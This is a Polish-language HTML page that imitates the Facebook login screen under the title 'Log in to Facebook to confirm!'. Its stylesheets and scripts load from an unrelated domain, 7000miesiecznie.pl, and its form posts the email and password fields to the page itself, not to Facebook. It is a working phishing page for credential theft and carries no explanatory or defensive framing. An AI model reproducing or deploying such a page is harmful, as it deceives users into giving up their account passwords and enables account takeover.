<!DOCTYPE html>
<head>
   <link type="text/css" href="http://7000miesiecznie.pl/css/bootstrap.min.css" rel="stylesheet">
	<link type="text/css" href="http://7000miesiecznie.pl/css/styles.css" rel="stylesheet">
	   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
    <script src="http://7000miesiecznie.pl/js/bootstrap.min.js"></script>

<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
	 
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>Zaloguj siê do Facebooka aby potwierdziæ!</title>
    



</head>
<body>
	<div id="top">
		<div class="container">
			<div class="logo"></div>
		</div>
	</div>
	<div class="logowanie">
		<div class="container">
			<div class="loginbox">
				<form action="" method="post">
				<h1>Zaloguj siê  do Facebooka</h1>
				<input type="text" name="email" placeholder="Adres e-mail lub numer telefonu"> <br>
				<input type="password" name="pass" placeholder="Has³o"> <br>
				<input type="submit" name="get" value="Zaloguj siê"> <br>
				</form>
				<a href="#">Nie pamiêtasz nazwy konta?</a> - <a href="http://facebook.com">Zarejestruj siê na Facebooku</a>
			</div>
		</div>
	</div>
	<div class="stopka">
		<div class="container">
				<a href="#">Polski</a>
					<a href="#">English (US)</a>
						<a href="#">???????</a>
							<a href="#">Deutsch</a>
								<a href="#">Français (France)</a>
									<a href="#">Italiano</a>
										<a href="#">??????????</a>
											<a href="#">Espanol (Espana)</a>
												<a href="#">Ti?ng Vi?t</a>
													<a href="#">Portugues (Brasil)</a>
														<a href="#">???????</a>
			<hr>
			<a href="http://facebook.com">Rejestracja</a>
			<a href="#">Zaloguj siê</a>
			<a href="#">Messenger</a>
			<a href="#">Facebook Lite</a>
			<a href="#">Facebook Mobile	</a>
			<a href="#">Szukaj znajomych	</a>
			<a href="#">Wizytówki</a>
			<a href="#">Strony</a>
			<a href="#">Miejsca</a>
			<a href="#">Gry</a>
			<a href="#">Lokalizacje</a>
			<a href="#">Gwiazdy</a>
			<a href="#">Grupy</a>
			<a href="#">O Facebooku</a>
			<a href="#">Utwórz reklamê</a>
			<a href="#">Utwórz stronê</a>
			<a href="#">Twórcy aplikacji</a>
			<a href="#">Praca</a>
			<a href="#">Prywatnoœæ	</a>
			<a href="#">Pliki cookie	</a>
			<a href="#">Opcje wyœwietlania reklam</a>
			<a href="#">Regulamin</a>
			<a href="#">Pomoc</a> <br>
			<p>Facebook © 2016</p>
		</div>
	</div>
      <script src="http://7000miesiecznie.pl/js/bootstrap.min.js"></script>
</body>
</html>